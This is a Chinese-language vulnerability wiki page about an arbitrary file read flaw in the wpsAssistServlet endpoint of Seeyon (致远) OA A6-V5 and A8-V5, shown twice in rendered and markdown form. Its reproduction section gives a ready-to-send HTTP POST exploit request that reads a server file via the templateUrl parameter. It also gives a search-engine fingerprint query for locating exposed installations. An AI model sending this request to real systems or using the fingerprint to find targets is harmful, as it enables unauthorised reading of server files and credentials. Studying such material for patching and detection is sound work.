fofamini-wiki

登录白背景

源码

致远OA wpsAssistServlet存在任意文件读取漏洞

一、漏洞简介

致远OA办公自动化软件，用于OA办公自动化软件的开发销售。2010年，用友致远更名为致远协创。2017年更名为致远互联。北京致远互联软件股份有限公司（简称：致远互联）成立于2002年3月，总部设立在北京，是一家集协同办公产品的设计、研发、销售及服务为一体的企业。致远OA wpsAssistServlet存在任意文件读取漏洞。

二、影响版本

致远OA A6-V5
致远OA A8-V5

三、资产测绘

hunterapp.name="致远 OA"
特征

四、漏洞复现

POST /seeyon/wpsAssistServlet HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Host: 
Accept: text/html, image/gif, image/jpeg, ; q=.2, */; q=.2
Connection: close
Content-Length: 44

flag=template&templateUrl=C:/windows/win.ini

原文: https://www.yuque.com/xiaokp7/ocvun2/dqkx80fw0lpc2ggi

# 致远OA wpsAssistServlet存在任意文件读取漏洞

# 一、漏洞简介
致远OA办公自动化软件，用于OA办公自动化软件的开发销售。2010年，用友致远更名为致远协创。2017年更名为致远互联。北京致远互联软件股份有限公司（简称：致远互联）成立于2002年3月，总部设立在北京，是一家集协同办公产品的设计、研发、销售及服务为一体的企业。致远OA wpsAssistServlet存在任意文件读取漏洞。

# 二、影响版本
+ 致远OA A6-V5
+ 致远OA A8-V5

# 三、资产测绘
+ hunter`app.name="致远 OA"`
+ 特征

![1696170455722-07cf9647-f30f-4dc6-b60b-9f38c791ef72.png](./img/121rIelkhapH30F4/1696170455722-07cf9647-f30f-4dc6-b60b-9f38c791ef72-573591.png)

# 四、漏洞复现
```java
POST /seeyon/wpsAssistServlet HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Host: 
Accept: text/html, image/gif, image/jpeg, ; q=.2, */; q=.2
Connection: close
Content-Length: 44

flag=template&templateUrl=C:/windows/win.ini
```

![1713882883560-5d471a4c-0d8f-4ac9-9ae6-91455912389b.png](./img/121rIelkhapH30F4/1713882883560-5d471a4c-0d8f-4ac9-9ae6-91455912389b-165213.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dqkx80fw0lpc2ggi>